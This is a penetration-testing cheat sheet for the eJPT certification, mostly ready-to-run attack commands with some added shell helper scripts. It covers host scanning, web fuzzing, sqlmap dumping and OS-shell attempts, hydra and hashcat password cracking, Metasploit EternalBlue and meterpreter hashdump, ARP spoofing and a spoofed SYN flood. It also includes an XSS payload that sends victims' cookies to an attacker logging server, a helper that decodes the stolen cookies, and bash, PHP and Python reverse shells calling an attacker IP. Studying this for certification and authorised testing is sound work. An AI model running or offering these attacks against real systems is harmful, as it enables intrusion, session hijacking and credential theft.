
This post collects commands to prepare for the eLearnSecurity eJPT exam. Angle-bracketed names such as <target> are placeholders to replace with your own values.


host discovery (nmap):

nmap -sn <target_range> -oN sweep.txt
nmap -sn -T4 -oG - <target_range> | awk '/Up$/{print $2}' > hosts.txt

The first form saves the full ping-sweep report; the second writes one IP per line, which is the format -iL expects in the port scan below.
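Added example (not from the original post): a small POSIX shell helper that turns the grepable ping-sweep output into the clean one-IP-per-line list that -iL expects, dropping nmap's comment lines and any host that is not Up. The 10.10.10.0/24 range and the sweep output embedded below are constructed for the demo, not a real scan.

```shell
#!/bin/sh
# Added example: build hosts.txt from an nmap -oG ping sweep.
# The 10.10.10.0/24 range and the sample output below are constructed placeholders.

# Print the IP of every host nmap marked "Up". Reads -oG output on stdin.
# -oG emits one "Host: <ip> (<name>)  Status: Up" line per live host plus
# "# Nmap ..." comment lines, which the /^Host:/ anchor drops.
up_hosts() {
    awk '/^Host:/ && /Status: Up$/ { print $2 }'
}

# Constructed -oG output standing in for:  nmap -sn -T4 -oG - 10.10.10.0/24
SAMPLE_SWEEP='# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sn -T4 -oG - 10.10.10.0/24
Host: 10.10.10.1 ()     Status: Up
Host: 10.10.10.5 (fileserver.lab)       Status: Up
Host: 10.10.10.7 ()     Status: Down
# Nmap done at Mon Jan  1 10:00:05 2024 -- 256 IP addresses (2 hosts up) scanned in 4.51 seconds'

# Run the filter over the sample. On a real engagement pipe nmap into up_hosts instead:
#   nmap -sn -T4 -oG - 10.10.10.0/24 | up_hosts > hosts.txt
#   nmap -Pn -sV -T4 -A -p- --open -iL hosts.txt -oN ports.txt
demo_up_hosts() {
    printf '%s\n' "$SAMPLE_SWEEP" | up_hosts
}

demo_up_hosts
```

The `/^Host:/` anchor matters: the trailing "# Nmap done ... (2 hosts up)" comment also ends in a word that a looser `/Up$/` pattern would not match here, but other nmap versions print different summaries, so matching the Host: record explicitly keeps the list clean.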

open ports scan of the discovered hosts (save to file; --open hides closed and filtered ports, -A adds OS detection, traceroute and default scripts):

nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open

UDP port scan (slow; narrow it with -p or --top-ports when time is short):

nmap -sU -sV <target>

nmap vuln scan example (unsafe=1 enables scripts that may crash the service, so only use it where that is acceptable):

nmap --script vuln --script-args=unsafe=1 -iL hosts.txt

nmap repeated SYN scan with a spoofed source (the course's "SYN flood" example; -S sets the spoofed source address and needs -e for the interface, and replies go to the spoofed host, so you see no results):

watch -n 10 "nmap -e wlan0 -Pn -T5 -S <spoofed_ip> <target>"

spotting a firewall

If an nmap TCP scan finds a well-known port open but the version probe cannot identify the service, something may sit between you and the service (a firewall, proxy or load balancer), or the service is simply non-standard.

For example:

80/tcp  open   http?    syn-ack ttl 64

Another example:

80/tcp  open   tcpwrapped   syn-ack ttl 64

"tcpwrapped" means the TCP handshake completed but the remote side closed the connection before any data was exchanged: the port is open, but an access control (tcp wrappers, an ACL, a proxy) rejects us right after the handshake.

Both are worth treating as signs of filtering, but confirm rather than assume:

  • Use "--reason" to see why nmap marked a port open, closed or filtered.
  • A "RST" (reason "reset") in reply to our SYN means the port is closed and the host answered directly. That is not a firewall.
  • "no-response" (our SYN was silently dropped) or an ICMP "admin-prohibited" reply is what a filtering firewall looks like; nmap reports such ports as filtered.
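Added example (not from the original post): an awk filter that reads the REASON column of `nmap --reason` output and states what each port tells you about filtering, so "reset", "no-response", "admin-prohibited", "tcpwrapped" and an unidentified "http?" are not lumped together as "firewall". The scan output embedded below is constructed; the 10.10.10.254 address is a placeholder.

```shell
#!/bin/sh
# Added example: interpret the REASON column of "nmap --reason" output.
# The sample scan output below is constructed, not a real scan.

# Classify each "<port>/<proto> <state> <service> <reason>" line read on stdin.
explain_reasons() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ {
        port = $1; state = $2; svc = $3; reason = $4
        if (reason == "reset")
            why = "closed: host replied RST itself, nothing filtering this port"
        else if (reason == "no-response")
            why = "filtered: our probe was dropped, likely a firewall/ACL"
        else if (reason ~ /prohibited$/)
            why = "filtered: a device sent ICMP " reason ", an explicit filter"
        else if (svc == "tcpwrapped")
            why = "open but closed after handshake: tcp wrapper / ACL / proxy"
        else if (svc ~ /[?]$/)
            why = "open, service unidentified: probe manually, possible proxy or filter"
        else
            why = "open: " svc " identified normally"
        print port "\t" why
    }'
}

# Constructed output of:  nmap -sV --reason -p 22,80,443,3306,8080,8443 <target>
SAMPLE_SCAN='PORT     STATE    SERVICE    REASON
22/tcp   open     ssh        syn-ack ttl 64
80/tcp   open     http?      syn-ack ttl 64
443/tcp  closed   https      reset ttl 64
3306/tcp filtered mysql      no-response
8080/tcp open     tcpwrapped syn-ack ttl 64
8443/tcp filtered https-alt  admin-prohibited from 10.10.10.254'

demo_reasons() {
    printf '%s\n' "$SAMPLE_SCAN" | explain_reasons
}

demo_reasons
```

Usage on a real scan: `nmap -sV --reason -p- <target> | explain_reasons`. The "closed" verdict is the one people get wrong: a RST proves the host is reachable and nothing in the path filtered that port.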


masscan open-only examples:

sudo masscan <target_range> -p 21,22,80,8080,445,9200 --rate 64000 --wait 0 --open-only -oG masscan.gnmap
sudo masscan -iL hosts.list -p0-65535 --rate 64000 --open-only


httprint banner grabbing:

httprint -P0 -s /usr/share/httprint/signatures.txt -h <target>


add a route (linux):

ip route add <network>/<prefix> via <gateway>

routing table:

netstat -rn
Kernel IP routing table
Destination      Gateway        Genmask         Flags   MSS Window  irtt Iface
<network>        <gateway>      <netmask>       UG        0 0          0 tap0


subdomain discovery of a target with sublist3r:

sublist3r -d <domain>


wireshark display filters

filter by ip (either direction)

ip.addr == <ip>

filter by destination ip

ip.dst == <ip>

filter by source ip

ip.src == <ip>

filter by tcp port

tcp.port == 25

filter by ip addr and port

ip.addr == <ip> and tcp.port == 8080

filter SYN flag only (connection attempts, not the SYN/ACK replies)

tcp.flags.syn == 1 and tcp.flags.ack == 0

broadcast filter

eth.dst == ff:ff:ff:ff:ff:ff

web app enumeration (gobuster)

fuzz directories (use a directory wordlist; rockyou is a password list):

gobuster dir -u http://<target> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

fuzz files (-x appends the given extensions to every word):

gobuster dir -u http://<target> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -o output.txt

webapp enum (ffuf)

directory discovery (ffuf replaces the FUZZ keyword with each word):

ffuf -w wordlist.txt -u http://<target>/FUZZ

file discovery:

ffuf -w wordlist.txt -u http://<target>/FUZZ -e .aspx,.php,.txt,.html

only show responses with the given status codes:

ffuf -w /usr/share/wordlists/dirb/small.txt -u http://<target>/FUZZ -mc 200,301

the -maxtime flag stops the fuzzing after the given number of seconds:

ffuf -w wordlist.txt -u http://<target>/FUZZ -maxtime 60

number of threads:

ffuf -w wordlist.txt -u http://<target>/FUZZ -t 64


sql injection (sqlmap)

determine the databases:

sqlmap -u "<url>" --dbs

determine the tables:

sqlmap -u "<url>" -D dbname --tables

if the tables cannot be listed, guess them using common names:

sqlmap -u "<url>" -D dbname --common-tables

dump a table's data:

sqlmap -u "<url>" -D dbname -T table --dump

try to get an os shell (needs a stacked or file-write capable injection and a writable web root or xp_cmdshell):

sqlmap -u "<url>" --os-shell


xss

check example:

<script>alert("hack :)")</script>

cookie stealing: there are four components as follows:

  • attacker client pc
  • attacker logging server
  • vulnerable server
  • victim client pc

  1. attacker: first finds a vulnerable server and its injection point.
  2. attacker: enters the following snippet in order to hijack the cookie kept by the victim client pc (the address <attacker_logging_server> belongs to the attacker logging server in this example; encodeURIComponent keeps the ";" and spaces in a multi-cookie string intact, and cookies flagged HttpOnly are not visible to document.cookie):

<script>var i = new Image(); i.src="http://<attacker_logging_server>/?c="+encodeURIComponent(document.cookie);</script>

  3. attacker: logs into the attacker logging server and runs the following listener (port 80 needs root; -k keeps listening after each connection):

nc -vv -k -l -p 80

  4. attacker: when the victim client pc browses the vulnerable server, the cookie arrives in the request line printed by the command above.
  5. attacker: after obtaining the victim's cookie, use the Firefox add-on Cookie Quick Manager to replace your own cookie with the victim's, in an effort to hijack the victim's session and privileges.
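Added example (not from the original post): the listener above prints the raw HTTP request, so the cookie arrives URL-encoded in the query string. This POSIX shell helper extracts the "c" parameter and decodes it with a pure-awk percent decoder, which is what you paste into Cookie Quick Manager. The request below is constructed; 10.10.10.99 stands in for the attacker logging server.

```shell
#!/bin/sh
# Added example: pull the stolen cookie out of the raw request the nc listener prints.
# The request below is constructed; 10.10.10.99 stands in for the attacker logging server.

# URL-decode stdin: "+" becomes a space, "%XX" becomes the byte XX (pure POSIX awk,
# so it does not depend on printf supporting \x escapes).
url_decode() {
    awk 'BEGIN { for (i = 0; i < 16; i++) { hex[sprintf("%x", i)] = i; hex[sprintf("%X", i)] = i } }
    {
        s = $0; out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            if (c == "+") { out = out " "; s = substr(s, 2) }
            else if (c == "%" && (substr(s, 2, 1) in hex) && (substr(s, 3, 1) in hex)) {
                out = out sprintf("%c", hex[substr(s, 2, 1)] * 16 + hex[substr(s, 3, 1)])
                s = substr(s, 4)
            } else { out = out c; s = substr(s, 2) }
        }
        print out
    }'
}

# Print the decoded "c" query parameter of the GET request read on stdin, i.e. the
# document.cookie value the injected <script> appended. Fails if the request has none.
extract_cookie() (
    raw=$(sed -n 's#^GET /?c=\([^ ]*\) HTTP/.*#\1#p' | head -n 1)
    [ -n "$raw" ] || return 1
    printf '%s\n' "$raw" | url_decode
)

# Constructed request, as the victim browser would send it to
#   nc -vv -k -l -p 80   running on 10.10.10.99
SAMPLE_REQUEST='GET /?c=PHPSESSID%3Dabc123%3B+theme%3Ddark HTTP/1.1
Host: 10.10.10.99
User-Agent: Mozilla/5.0
Referer: http://vulnerable.lab/guestbook.php
Connection: keep-alive
'

demo_cookie() {
    printf '%s\n' "$SAMPLE_REQUEST" | extract_cookie
}

demo_cookie
```

Usage with a live listener: `nc -vv -k -l -p 80 | tee requests.log`, then `extract_cookie < requests.log`. The Referer header is worth keeping too: it tells you which page on the vulnerable server fired the payload.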

bruteforce (hydra, john, hashcat)

wordlist generation (spider the site and keep words of at least 3 characters):

cewl -m 3 -w wordlist.txt http://<target>

hydra http basic auth brute

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt <target> http-head /admin/

hydra brute http digest

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt <target> http-get /admin/

hydra brute http post form (the last field is the string that appears on a failed login):

hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"

hydra brute http authenticated post form (H= adds a header, here the session cookie):

hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"

hydra brute ssh (-f stops after the first valid pair, -s sets a non-default port)

hydra -f -v -V -L users.txt -P rockyou-15.txt -s 2223 ssh://<target>
hydra -v -V -l admin -P rockyou-10.txt ssh://<target>

combine passwd with shadow file for john the ripper:

unshadow passwd shadow > crack.hash

john the ripper wordlist attack:

john --wordlist=/usr/share/wordlists/rockyou.txt crack.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --users=users.txt test.hash

hashcat (-m selects the hash type: unshadow output on a modern Linux box is $6$ sha512crypt, mode 1800; mode 1000 is NTLM and only fits hashes such as hashdump output):

hashcat -m 1800 -a 0 -o found.txt --remove crack.hash rockyou-10.txt
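Added example (not from the original post): a POSIX shell helper that picks the hashcat -m mode from the hash format instead of guessing it. It recognises the two files this page produces, unshadow output (crypt hashes, identified by their $id$ prefix) and pwdump-style hashdump lines (32-hex NTLM in the fourth field), and refuses formats hashcat cannot crack. The hash lines in the test are constructed and are not real credentials.

```shell
#!/bin/sh
# Added example: choose the hashcat mode from the hash format.
# Sample lines used with it are constructed placeholders, not real hashes.

# Print the hashcat -m mode for one hash line, or a reason it cannot be cracked with hashcat.
hashcat_mode() (
    line=$1
    h=$(printf '%s' "$line" | cut -d: -f2)
    case "$h" in
        '$1$'*)        echo 500 ;;    # md5crypt
        '$5$'*)        echo 7400 ;;   # sha256crypt
        '$6$'*)        echo 1800 ;;   # sha512crypt (default on most Linux distributions)
        '$2'[aby]'$'*) echo 3200 ;;   # bcrypt
        '$y$'*|'$7$'*) echo "unsupported: yescrypt, use john" ;;
        '*'|'!'*|'')   echo "no password hash (locked or empty)" ;;
        *[!0-9]*)      echo "unknown format" ;;
        *)
            # Field 2 is numeric, so this is a pwdump line user:RID:LMhash:NThash:::
            # The NT hash is field 4 and must be exactly 32 hex characters.
            nt=$(printf '%s' "$line" | cut -d: -f4)
            case "$nt" in
                *[!0-9a-fA-F]*) echo "unknown format" ;;
                *) if [ "${#nt}" -eq 32 ]; then echo 1000; else echo "unknown format"; fi ;;
            esac ;;
    esac
)

# Mode for a whole file, taken from its first line (assumes one hash format per file).
hashcat_mode_for_file() {
    hashcat_mode "$(head -n 1 "$1")"
}

# Run hashcat with the detected mode: crack <hashfile> <wordlist>
crack() {
    mode=$(hashcat_mode_for_file "$1")
    case "$mode" in
        *[!0-9]*) echo "cannot crack $1 with hashcat: $mode" >&2; return 1 ;;
    esac
    hashcat -m "$mode" -a 0 -o found.txt --remove "$1" "$2"
}
```

Usage: `crack crack.hash rockyou-10.txt` for unshadow output, `crack ntlm.hash rockyou-10.txt` for hashdump output saved in pwdump format. Lines whose password field is `*` or `!` are service or locked accounts and only waste GPU time.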


wordpress (wpscan)

wpscan --url http://<target> --enumerate u
wpscan --url http://<target> -e vp --plugins-detection mixed --api-token API_TOKEN
wpscan --url http://<target> -e u --passwords /usr/share/wordlists/rockyou.txt
wpscan --url http://<target> -U admin -P /usr/share/wordlists/rockyou.txt



mysql

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <target>

mysql -h <target> -P 13306 -u root -p -e "show databases;"
mysql -h <target> -P 13306 -u root -p -e "use mydb;show tables;"
mysql -h <target> -P 13306 -u root -p -e "use mydb;select * from users;"


metasploit

search exploit (keywords narrow the module list):

msf> search cve:2011 port:135 platform:windows target:XP


mssql login bruteforce

use auxiliary/scanner/mssql/mssql_login
set rhosts <target>
set rport 1433
set username admin
set password 12345
set verbose true

mssql payload (also set lhost and lport for the reverse payload before running it)

use exploit/windows/mssql/mssql_payload
set rhosts <target>
set rport 1433
set srvport 53
set username admin
set password qwerty
set payload windows/x64/meterpreter_reverse_tcp

ssh login enumeration (bruteforce; the same username list is reused as the password list here to catch user == password accounts)

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts <target>
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true

eternal blue x86 architecture example (ms17_010_psexec abuses the same bug through named pipes and works against both x86 and x64 targets):

use exploit/windows/smb/ms17_010_psexec
show options

eternal blue x64 architecture example (the eternalblue module was written for 64-bit targets):

use exploit/windows/smb/ms17_010_eternalblue
show options
set payload windows/x64/meterpreter/reverse_tcp


meterpreter pivoting and post-exploitation

meterpreter> run autoroute -s <subnet>/<netmask>

sessions -l
sessions -i 1

sysinfo, ifconfig, route, getuid
getsystem (privesc)

download <file> /root/
upload <file> C:\\Windows

use post/windows/gather/hashdump

windows shares

enumeration with nmblookup and smbclient (-N means no password, i.e. a null session)

nmblookup -A <target>
smbclient -L //<target> -N
smbclient //<target>/<share> -N

enum4linux -a <target>

enumeration with nmap:

ls -l /usr/share/nmap/scripts/ | grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse

nmap --script=smb-enum-users <target>

null sessions

  1. Use "enum4linux -n" (a wrapper around nmblookup) to check whether the "<20>" name, the file server service, is registered:

enum4linux -n <target>

  2. "<20>" means the host offers SMB file sharing; it does not by itself prove that anonymous access is allowed. Confirm the null session with the full enum4linux -a run from above or directly with smbclient as in the next step.
  3. If the null session is accepted, you can remotely list all shares of the target:

smbclient -L WORKGROUP -I <target> -N -U ""

  4. You can also connect to a share (here the administrative c$ share) with the same empty credentials:

smbclient \\\\<target>\\c$ -N -U ""

  5. Download the files stored on the share:

smb: \> get Congratulations.txt
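Added example (not from the original post): a POSIX shell helper that reads `nmblookup -A` output, picks out the NetBIOS name that registers the `<20>` file-server service (ignoring `<GROUP>` entries, which are workgroup names rather than hosts), and only then prints the null-session checks to run against it. The nmblookup output embedded below is constructed; 10.10.10.5 and FILESERVER are placeholders.

```shell
#!/bin/sh
# Added example: from "nmblookup -A" output, find the <20> file-server name and
# print the null-session checks for it. Sample output and addresses are constructed.

# Print each NetBIOS name that registers <20> (file server), one per line;
# exit 1 if none does. <GROUP> entries are workgroup names, not hosts.
netbios_file_servers() {
    awk '$2 == "<20>" && $0 !~ /<GROUP>/ { print $1; found = 1 }
         END { exit found ? 0 : 1 }'
}

# Print the null-session commands for host $1, using the nmblookup output on stdin.
# Nothing is executed here; the commands are what you run next by hand.
null_session_plan() (
    host=$1
    name=$(netbios_file_servers) || { echo "no <20> file service registered on $host"; return 1; }
    echo "smbclient -L $name -I $host -N -U \"\""
    echo "enum4linux -a $host"
)

# Constructed output of:  nmblookup -A 10.10.10.5
SAMPLE_NMBLOOKUP='Looking up status of 10.10.10.5
        FILESERVER      <00> -         B <ACTIVE>
        FILESERVER      <20> -         B <ACTIVE>
        WORKGROUP       <00> - <GROUP> B <ACTIVE>
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>

        MAC Address = 00-0C-29-AA-BB-CC'

demo_plan() {
    printf '%s\n' "$SAMPLE_NMBLOOKUP" | null_session_plan 10.10.10.5
}

demo_plan
```

Usage on a live host: `nmblookup -A <target> | null_session_plan <target>`. Passing the real NetBIOS name to `-L` matters on older SMB1-only hosts, which can refuse a share listing when the name in the request does not match.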

ARP spoofing (enable forwarding first, or the victim loses connectivity and notices)

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t <victim> -r <gateway>

reverse shell (start a listener on the attacker machine on <port> first)

bash:

bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1

php one line (bash):

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'"); ?>

python (works with python2 and python3; pty.spawn gives a proper tty):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'